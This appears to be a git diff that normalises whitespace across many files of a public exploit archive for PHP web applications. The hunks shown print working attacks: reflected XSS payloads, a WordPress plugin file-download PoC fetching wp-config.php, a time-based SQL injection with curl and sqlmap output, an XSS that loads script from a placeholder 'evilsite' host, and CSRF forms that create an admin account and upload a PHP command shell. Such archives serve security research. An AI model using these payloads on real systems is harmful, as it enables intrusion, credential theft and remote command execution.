 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'order_by' parameter of the /pages/preview.php CGI :
 /pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=<"jfu
-nqd >&sort=&archive=&k=">< Back to resource view</a>
+nqd >&sort=&archive=&k=">< Back to resource view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 Clicking directly on these URLs should exhibit the issue :
 (you will probably need to read the HTML source)
@@ -524,7 +524,7 @@ Using the GET HTTP method, Nessus found that :
 test) :
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=<IMG
-SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
+SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
 esource view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 /pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
@@ -532,7 +532,7 @@ esource view</a>
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=<IMG
-SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
+SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
 esource view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 + The 'sort' parameter of the /pages/preview.php CGI :
@@ -540,14 +540,14 @@ esource view</a>
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
+=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
 rce view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 /pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
 ­­­­­­­­ output ­­­­­­­­
 <p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
 /pages/view.php?ref=&search=&offset=&order_by=&sort
-=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
+=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
 rce view</a>
 ­­­­­­­­­­­­­­­­­­­­­­­­
 
diff --git a/exploits/php/webapps/35625.txt b/exploits/php/webapps/35625.txt
index a6a4d3b90..ebcf17ae7 100644
--- a/exploits/php/webapps/35625.txt
+++ b/exploits/php/webapps/35625.txt
@@ -12,21 +12,21 @@
 
 PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
 We are some librarians, users and developers deploring this state of affairs.
- 
+ 
 PMB is based on web technology. This is what we sometimes call a 'web-app'.
 PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
- 
+ 
 The main functions of PMB are :
- 
-    * Supporting the UNIMARC format
-    * Authorities management (authors, publishers, series, subjects...)
-    * Management of loans, holds, borrowers...
-    * A user-friendly configuration
-    * The ability to import full bibliographic records
-    * A user-friendly OPAC integrating a browser
-    * Loans management with a module designed to serve even the very small establishments
-    * Serials management
-    * Simple administration procedures that can be handled easily even by the library staff...
+ 
+    * Supporting the UNIMARC format
+    * Authorities management (authors, publishers, series, subjects...)
+    * Management of loans, holds, borrowers...
+    * A user-friendly configuration
+    * The ability to import full bibliographic records
+    * A user-friendly OPAC integrating a browser
+    * Loans management with a module designed to serve even the very small establishments
+    * Serials management
+    * Simple administration procedures that can be handled easily even by the library staff...
 
 -==== Vulnerability ====-
 
diff --git a/exploits/php/webapps/35906.txt b/exploits/php/webapps/35906.txt
index a5b2e1a31..df2cdc9a8 100644
--- a/exploits/php/webapps/35906.txt
+++ b/exploits/php/webapps/35906.txt
@@ -164,12 +164,12 @@ div.phpwebquest a { font-size : 7.5pt;};
                         <tr>
                           <td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
                               <tr> 
-                                <td width="1%" height="139"> </td>
+                                <td width="1%" height="139"> </td>
                                 <td width="97%" valign="middle"><div align="left"> 
                                     <table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
                                       <tr> 
                                         <td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
-                                        <td width="2%"> </td>
+                                        <td width="2%"> </td>
 
                                         <td width="97%"><? echo $texto_actual;?><br> 
                         <table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
@@ -201,43 +201,43 @@ div.phpwebquest a { font-size : 7.5pt;};
                                       </tr>
                                     </table>
                                   </div></td>
-                                <td width="2%"> </td>
+                                <td width="2%"> </td>
                               </tr>
                             </table></td>
 
                           <td width="15%" valign="top">
-						  	<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
+						  	<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
 						  	<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
 							 
 							  <tr> 
-                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
+                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
                               </tr>
 							  <tr> 
                                 <td height="1" bgcolor="#FFFFFF"></td>
                               </tr>
 
                               <tr> 
-                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
+                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
                               </tr>
 							  <tr> 
                                 <td height="1" bgcolor="#FFFFFF"></td>
                               </tr>
                               <tr> 
-                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
+                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
                               </tr>
 
 							  <tr> 
                                 <td height="1" bgcolor="#FFFFFF"></td>
                               </tr>
                               <tr> 
-                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
+                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
 
                               </tr>
 							  <tr> 
                                 <td height="1" bgcolor="#FFFFFF"></td>
                               </tr>
                               <tr> 
-                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
+                                <td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
                               </tr>
 							</table></td>
                         </tr>
@@ -251,7 +251,7 @@ div.phpwebquest a { font-size : 7.5pt;};
 			  <table width="100%" border="0" cellspacing="1" cellpadding="0">
                   <tr>
                     <td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
-                    <td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
+                    <td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
                   </tr>
                 </table>
 				</td>
diff --git a/exploits/php/webapps/36611.txt b/exploits/php/webapps/36611.txt
index 7c16015d5..e441b34d3 100644
--- a/exploits/php/webapps/36611.txt
+++ b/exploits/php/webapps/36611.txt
@@ -40,8 +40,8 @@ function process_data()
 <body>
 <form id="myform" name="myform" action="#" method="post" enctype="multipart/form-data">
 	Target IP: <input type="text" id="targetip" name="targetip">
-	<input type="radio" id="rb1" name="rb1" value="http://" checked>HTTP 
-	<input type="radio" id="rb1" name="rb1" value="https://">HTTPS <br>
+	<input type="radio" id="rb1" name="rb1" value="http://" checked>HTTP 
+	<input type="radio" id="rb1" name="rb1" value="https://">HTTPS <br>
 	Upload File: <input type="file" id="file1" name="n1"><br> <!--name="00958fd0af98291fdf517e3fe763da5c"-->
 	Upload Path: <input type="text" id="upload_path" name="upload_path" value="Li4vLi4vLi4vLi4v"><br><br>
 	<fieldset>
diff --git a/exploits/php/webapps/36774.txt b/exploits/php/webapps/36774.txt
index 576854d17..02592ae22 100644
--- a/exploits/php/webapps/36774.txt
+++ b/exploits/php/webapps/36774.txt
@@ -1,23 +1,23 @@
-# Exploit Title     :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
+# Exploit Title     :WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
 # Vendor			:Miwisoft LLC
-# Vendor Homepage   :http://www.miwisoft.com
-# Version  			:1.0.5
-# Tested on         :Win7/Chrome/Firefox
-# Exploit Author    :Necmettin COSKUN =>@babayarisi
-# Discovery date    :04/15/2015
-  
+# Vendor Homepage   :http://www.miwisoft.com
+# Version  			:1.0.5
+# Tested on         :Win7/Chrome/Firefox
+# Exploit Author    :Necmettin COSKUN =>@babayarisi
+# Discovery date    :04/15/2015
+  
 
 MiwoFTP is a file manager plugin for Wordpress.
 
-  
+  
 Description
 ================
 Wordpress MiwoFTP Plugin 1.0.5 suffers from arbitrary file download vulnerability.
 
 Poc Exploit
 ================
- http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
-  
+ http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
+  
 ================
 #RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic
 
@@ -28,4 +28,4 @@ Poc Exploit
 
 Discovered by:
 ================
-Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
diff --git a/exploits/php/webapps/3719.pl b/exploits/php/webapps/3719.pl
index bc617064e..490c09f9f 100755
--- a/exploits/php/webapps/3719.pl
+++ b/exploits/php/webapps/3719.pl
@@ -15,7 +15,7 @@
 ###########################################################
 #
 # Описание:
-# Работа эксплойта основана на sql-инъекции в HTTP_CLIENT_IP.
+# Работа эксплойта основана на sql-инъекции в HTTP_CLIENT_IP.
 # Неавторизованный пользователь может выполнить произвольный SQL-запрос в базу.
 #
 # http://host.com/mybb/index.php
@@ -27,7 +27,7 @@
 # Мной был найден способ отказаться от использования benchmark,
 # что позволяет ускорить работу эксплойта, повысить надежность полученных данных.
 # 
-# Работа эксплойта основана на провоцировании "Subquery returns more than 1 row" ошибки,
+# Работа эксплойта основана на провоцировании "Subquery returns more than 1 row" ошибки,
 # что позволяет произвести blind-sql-inj: 
 # 
 # mybb
diff --git a/exploits/php/webapps/37248.txt b/exploits/php/webapps/37248.txt
index 0301be84e..17b65a4f1 100644
--- a/exploits/php/webapps/37248.txt
+++ b/exploits/php/webapps/37248.txt
@@ -1,26 +1,26 @@
 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-|   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       |
-|            Date: 05.19.2015                                                          |
-|   Exploit Daddy: pancaker                                                            |
-| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
-|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
-|         Version: v1.0                                                                |
-|       Tested On: Ubuntu 10.04                                                        |
+|   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       |
+|            Date: 05.19.2015                                                          |
+|   Exploit Daddy: pancaker                                                            |
+| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
+|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
+|         Version: v1.0                                                                |
+|       Tested On: Ubuntu 10.04                                                        |
 |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
-|   SHOUTout: milw0rm &&& your mums pancakes                                           |
-| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       |
+|   SHOUTout: milw0rm &&& your mums pancakes                                           |
+| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       |
 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
 
 
 
 
-### vuln codez  related.php ###
+### vuln codez  related.php ###
 <?
 include("include/functions.php");
 
-$related = htmlspecialchars(trim($_GET['program']));               <-- this isnt going to save u
+$related = htmlspecialchars(trim($_GET['program']));               <-- this isnt going to save u
 
-$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'");   <- might as well b a straight get request lololol owned
+$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'");   <- might as well b a straight get request lololol owned
 $row = mysql_num_rows($query);
 if($row){
 ?>
@@ -39,9 +39,9 @@ root@woop:~# zzz='10'
 root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
 root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"
 
-real    0m10.008s
-user    0m0.004s
-sys    0m0.004s
+real    0m10.008s
+user    0m0.004s
+sys    0m0.004s
 
 
 
@@ -51,11 +51,11 @@ sys    0m0.004s
 ### sqlmap ###
 
 root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
-         _
- ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf}
-|_ -| . | |     | .'| . |
-|___|_  |_|_|_|_|__,|  _|
-      |_|           |_|   http://sqlmap.org
+         _
+ ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf}
+|_ -| . | |     | .'| . |
+|___|_  |_|_|_|_|__,|  _|
+      |_|           |_|   http://sqlmap.org
 
 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
@@ -67,24 +67,24 @@ root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?pr
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Parameter: program (GET)
-    Type: AND/OR time-based blind
-    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
-    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB
 
-    Type: UNION query
-    Title: MySQL UNION query (NULL) - 8 columns
-    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 8 columns
+    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
 ---
 [09:46:53] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
 web application technology: PHP 5.3.2, Apache 2.2.14
 back-end DBMS: MySQL 5.0.12
 [09:46:53] [INFO] fetching current user
-current user:    'root@localhost'
+current user:    'root@localhost'
 [09:46:53] [INFO] testing if current user is DBA
 [09:46:53] [INFO] fetching current user
 [09:46:53] [WARNING] reflective value(s) found and filtering out
-current user is DBA:    True
+current user is DBA:    True
 [09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'
 
 
@@ -92,14 +92,14 @@ current user is DBA:    True
 
 
 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-|           >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<          |
-|             <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>            |
+|           >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<          |
+|             <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>            |
 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
 
-                                   __
-___________    ____   ____ _____  |  | __ ___________
-\____ \__  \  /    \_/ ___\\__  \ |  |/ // __ \_  __ \
-|  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/
-|   __(____  /___|  /\___  >____  /__|_ \\___  >__|
-|__|       \/     \/     \/     \/     \/    \/
+                                   __
+___________    ____   ____ _____  |  | __ ___________
+\____ \__  \  /    \_/ ___\\__  \ |  |/ // __ \_  __ \
+|  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/
+|   __(____  /___|  /\___  >____  /__|_ \\___  >__|
+|__|       \/     \/     \/     \/     \/    \/
 .........................cant be pr0 without ascii art
\ No newline at end of file
diff --git a/exploits/php/webapps/3903.php b/exploits/php/webapps/3903.php
index 94ed40d64..2cb102af6 100644
--- a/exploits/php/webapps/3903.php
+++ b/exploits/php/webapps/3903.php
@@ -118,7 +118,7 @@ Vuln Code :
 	\$gversion    = \"$gversion\"; // version du programme - program version
 
 	\$guse_copyright = \"$guse_copyright\" ; // Indique si doit rajouter une image de droits d'auteur (copyright) sur chaque image de l'album -  Tells if must add a copyright picture on each picture of the album.
-	\$gimg_copyright = \"$gimg_copyright\";  // Image à utiliser pour les droits d'auteur (copyright) -	Picture to use for the copyright.												
+	\$gimg_copyright = \"$gimg_copyright\";  // Image à utiliser pour les droits d'auteur (copyright) -	Picture to use for the copyright.												
 	
 	
 	?>";
diff --git a/exploits/php/webapps/39468.txt b/exploits/php/webapps/39468.txt
index f4e2f3369..68585368b 100644
--- a/exploits/php/webapps/39468.txt
+++ b/exploits/php/webapps/39468.txt
@@ -1,9 +1,9 @@
-# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
-# Vendor Homepage   :http://www.vestacp.com
-# Version           :0.9.8-15
-# Exploit Author    :Necmettin COSKUN @babayarisi 
-# Blog              :http://ha.cker.io
-# Discovery date    :16/02/2016
+# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
+# Vendor Homepage   :http://www.vestacp.com
+# Version           :0.9.8-15
+# Exploit Author    :Necmettin COSKUN @babayarisi 
+# Blog              :http://ha.cker.io
+# Discovery date    :16/02/2016
 # Tested on         :Fedora23 - Chrome/Firefox/Maxthon
 
 We can use user-agent information to attack website like this. 
@@ -35,8 +35,8 @@ wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evi
 3. We wait Administrator to read access.log that injected our evil.js
 4. We log-in VestaCP via password we changed
 http(s)://victim:8083/
-  
-  
+  
+  
 Discovered by:
 ================
-Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
diff --git a/exploits/php/webapps/39469.txt b/exploits/php/webapps/39469.txt
index 39e1d46fe..97e1953e1 100644
--- a/exploits/php/webapps/39469.txt
+++ b/exploits/php/webapps/39469.txt
@@ -4,7 +4,7 @@
 # Date    : 27-10-2014 updated 18-02-2016
 # Version : >=1.491 
 # Author  : Necmettin COSKUN =>@babayarisi
-# Blog    :http://ha.cker.io
+# Blog    :http://ha.cker.io
 # Vendor  : http://www.directadmin.com/
 # Download: http://www.directadmin.com/demo.html
 =============================================================================
@@ -51,4 +51,4 @@ document.getElementById("resim").src=urlson;
 # don't be evil!
 Discovered by:
 ================
-Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
diff --git a/exploits/php/webapps/40755.html b/exploits/php/webapps/40755.html
index da96821cc..5f08d30b1 100644
--- a/exploits/php/webapps/40755.html
+++ b/exploits/php/webapps/40755.html
@@ -17,7 +17,7 @@ http://localhost/ATutor/mods/_core/courses/users/create_course.php
 Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
 
 ########################### CSRF PoC ###############################
- 
+ 
 <html>
    <------ CSRF POC ------>
   <body>
@@ -205,13 +205,12 @@ Vulnerability Disclosure Timeline:
==================================
2016-1
 </html>
 
 ---------------------------------------------------------------------------
- 
+ 
 Solution:
- 
+ 
 Patch is available. Install patch using the ATutor Patcher.
 
 Link to download patch:
 
 http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
----------------------------------------------------------------------------
- 
\ No newline at end of file
+---------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/41594.txt b/exploits/php/webapps/41594.txt
index 1b7b8aef9..834b15c98 100644
--- a/exploits/php/webapps/41594.txt
+++ b/exploits/php/webapps/41594.txt
@@ -24,7 +24,7 @@ editor = 3
 publisher = 4
 member = 5
 
-Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).  The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:
+Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).  The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:
 
 Original:
 
diff --git a/exploits/php/webapps/41784.txt b/exploits/php/webapps/41784.txt
index b9e418d30..9e3712f3f 100644
--- a/exploits/php/webapps/41784.txt
+++ b/exploits/php/webapps/41784.txt
@@ -47,11 +47,11 @@ Content-Type: image/jpeg
 
 <?php
 if(isset($_REQUEST['cmd'])){
-        echo "<pre>";
-        $cmd = ($_REQUEST['cmd']);
-        system($cmd);
-        echo "</pre>";
-        die;
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
 }
 ?>
 
@@ -72,27 +72,27 @@ Content-Disposition: form-data; name="bb2_screener_"
 
 1490835014 192.168.1.6
 -----------------------------8321182121675739546763935949--
- This is our screenshot from PoC: 
+ This is our screenshot from PoC: 
 |  |
 | Upload for valid image
  |
 
- 
+ 
 |  |
 | Change extension and insert your shell
  |
 
- 
+ 
 |  |
 | Your shell success to upload on server
  |
 
- 
+ 
 |  |
 | Example command for ipconfig
  |
 
- 
+ 
 |  |
 | Example command for net user
  |
diff --git a/exploits/php/webapps/41824.txt b/exploits/php/webapps/41824.txt
index 174ff43c1..6ec3c368d 100644
--- a/exploits/php/webapps/41824.txt
+++ b/exploits/php/webapps/41824.txt
@@ -30,41 +30,41 @@ III. Exploit:
 
 The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin:
 <html>
-  <!-- CSRF PoC on insert menu people -->
-  <body>
-    <form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
-      <input type="hidden" name="login" value="testing" />
-      <input type="hidden" name="logintype" value=“3” />  <!-- Type Login = 3 (HD) -->
-      <input type="hidden" name="password" value="testing" />
-      <input type="hidden" name="name" value="testing" />
-      <input type="hidden" name="email" value="testing&#64;local&#46;com" /> <!-- e.g: testing@local.com -->
-      <input type="hidden" name="company" value="60" />
-      <input type="hidden" name="department" value="1" />
-      <input type="hidden" name="phone" value="" />
-      <input type="hidden" name="branch" value="" />
-      <input type="hidden" name="mobile" value="" />
-      <input type="hidden" name="country" value="1" />
-      <input type="hidden" name="state" value="1" />
-      <input type="hidden" name="cpf" value="" />
-      <input type="hidden" name="city" value="1" />
-      <input type="hidden" name="neighborhood" value="Choose" />
-      <input type="hidden" name="zipcode" value="" />
-      <input type="hidden" name="typestreet" value="1" />
-      <input type="hidden" name="address" value="Choose" />
-      <input type="hidden" name="number" value="" />
-      <input type="hidden" name="complement" value="" />
-      <input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
-      <input type="hidden" name="location" value="" />
-      <input type="hidden" name="vip" value="N" />
-      <input type="hidden" name="filladdress" value="N" />
-      <input type="hidden" name="dtbirth" value="" />
-      <input type="hidden" name="gender" value="M" />
-      <input type="hidden" name="time&#95;value" value="" />
-      <input type="hidden" name="overtime" value="" />
-      <input type="hidden" name="changePassInsert" value="0" />
-      <input type="submit" value="Submit request" />
-    </form>
-  </body>
+  <!-- CSRF PoC on insert menu people -->
+  <body>
+    <form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
+      <input type="hidden" name="login" value="testing" />
+      <input type="hidden" name="logintype" value=“3” />  <!-- Type Login = 3 (HD) -->
+      <input type="hidden" name="password" value="testing" />
+      <input type="hidden" name="name" value="testing" />
+      <input type="hidden" name="email" value="testing&#64;local&#46;com" /> <!-- e.g: testing@local.com -->
+      <input type="hidden" name="company" value="60" />
+      <input type="hidden" name="department" value="1" />
+      <input type="hidden" name="phone" value="" />
+      <input type="hidden" name="branch" value="" />
+      <input type="hidden" name="mobile" value="" />
+      <input type="hidden" name="country" value="1" />
+      <input type="hidden" name="state" value="1" />
+      <input type="hidden" name="cpf" value="" />
+      <input type="hidden" name="city" value="1" />
+      <input type="hidden" name="neighborhood" value="Choose" />
+      <input type="hidden" name="zipcode" value="" />
+      <input type="hidden" name="typestreet" value="1" />
+      <input type="hidden" name="address" value="Choose" />
+      <input type="hidden" name="number" value="" />
+      <input type="hidden" name="complement" value="" />
+      <input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
+      <input type="hidden" name="location" value="" />
+      <input type="hidden" name="vip" value="N" />
+      <input type="hidden" name="filladdress" value="N" />
+      <input type="hidden" name="dtbirth" value="" />
+      <input type="hidden" name="gender" value="M" />
+      <input type="hidden" name="time&#95;value" value="" />
+      <input type="hidden" name="overtime" value="" />
+      <input type="hidden" name="changePassInsert" value="0" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
 </html>
 
 —> The second CSRF target is: /admin/home#/logos/
@@ -74,124 +74,124 @@ If we have minimum low privilege, we can remote code execute to make shell on mo
 If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):

 <!-- CSRF PoC - Login Page Logo -->
 <html>
-  <body>
-    <script>
-      function submitRequest()
-      {
-        var xhr = new XMLHttpRequest();
-        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
-        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
-        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
-        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
-        xhr.withCredentials = true;
-        var body = "-----------------------------1883328331133778598415248998\r\n" + 
-          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
-          "Content-Type: text/php\r\n" + 
-          "\r\n" + 
-          "\x3c?php\n" + 
-          "\n" + 
-          "if(isset($_REQUEST[\'cmd\'])){\n" + 
-          "        echo \"\x3cpre\x3e\";\n" + 
-          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
-          "        system($cmd);\n" + 
-          "        echo \"\x3c/pre\x3e\";\n" + 
-          "        die;\n" + 
-          "}\n" + 
-          "\n" + 
-          "?\x3e\r\n" + 
-          "-----------------------------1883328331133778598415248998--\r\n";
-        var aBody = new Uint8Array(body.length);
-        for (var i = 0; i < aBody.length; i++)
-          aBody[i] = body.charCodeAt(i); 
-        xhr.send(new Blob([aBody]));
-      }
-    </script>
-    <form action="#">
-      <input type="button" value="Submit request" onclick="submitRequest();" />
-    </form>
-  </body>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
+        xhr.withCredentials = true;
+        var body = "-----------------------------1883328331133778598415248998\r\n" + 
+          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
+          "Content-Type: text/php\r\n" + 
+          "\r\n" + 
+          "\x3c?php\n" + 
+          "\n" + 
+          "if(isset($_REQUEST[\'cmd\'])){\n" + 
+          "        echo \"\x3cpre\x3e\";\n" + 
+          "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
